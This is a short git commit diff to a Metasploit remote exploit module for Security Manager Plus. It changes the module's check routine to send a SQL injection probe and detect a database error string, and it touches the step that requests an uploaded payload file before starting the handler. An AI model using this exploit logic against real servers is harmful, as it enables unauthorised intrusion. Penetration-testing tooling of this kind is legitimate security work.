Make the check() try SQLI
parent
8c5a73bb7f
commit
f9bb910c3b
|
@ -52,14 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
#
|
||||
# A very gentle check to see if Security Manager Plus exists or not
|
||||
#
|
||||
def check
|
||||
res = send_request_raw({'uri' => '/SecurityManager.cc'})
|
||||
res = sqli_exec(Rex::Text.rand_text_alpha(1))
|
||||
|
||||
if res and res.body =~ /\<title\>SecurityManager Plus\<\/title\>/
|
||||
return Exploit::CheckCode::Detected
|
||||
if res and res.body =~ /Error during search/
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
@ -82,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = send_request_raw({'uri'=>"/#{rnd_fname}"})
|
||||
|
||||
# What @@version returns:
|
||||
# Linux = 5.0.36-enterprise
|
||||
# Windows = 5.0.36-enterprise-nt
|
||||
|
||||
|
@ -248,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
fname = "/#{File.basename(out)}"
|
||||
print_status("#{rhost}:#{rport} - Requesting #{fname}")
|
||||
res = send_request_raw({'uri' => fname})
|
||||
send_request_raw({'uri' => fname})
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue